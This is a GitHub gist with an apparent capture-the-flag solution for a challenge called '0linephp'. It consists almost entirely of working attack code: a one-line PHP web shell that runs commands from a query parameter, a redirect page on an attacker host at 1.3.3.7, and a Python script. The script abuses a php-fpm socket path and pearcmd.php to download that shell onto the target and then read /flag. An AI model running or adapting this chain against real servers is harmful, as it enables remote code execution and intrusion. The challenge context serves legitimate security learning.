Skip to content

Instantly share code, notes, and snippets.

@ginoah

ginoah/0linephp.md

Created January 1, 2022 06:29
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ginoah/6765c60bdf9e7c6cd682ed400094bd2a to your computer and use it in GitHub Desktop.
Save ginoah/6765c60bdf9e7c6cd682ed400094bd2a to your computer and use it in GitHub Desktop.
Download ZIP
Solution for 0linephp
Raw
0linephp.md

0linephp

Web shell

Host an simple web server that will redirect / to shell.php

index.php

<?php
  header('Location: http://1.3.3.7/shell.php');
?>

shell.php

<?='<?=system($_GET["c"]);?>'?>

Exploit

from urllib.request import urlopen

# challenge's host
host = 'http://target'

pearcmd = "/usr/local/lib/php/pearcmd.php?argv=+install+--installroot+/+http://1.3.3.7/" # your ip
payload = f"/index.php/unix:{'A'*5000}|fcgi://php:9000{pearcmd}"
urlopen(f"{host}{payload}")

shell = f"/tmp/pear/download/shell.php?c=cat+/flag"
payload = f"/index.php/unix:{'A'*5000}|fcgi://php:9000{shell}"
r = urlopen(f"{host}{payload}")
print(r.read())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment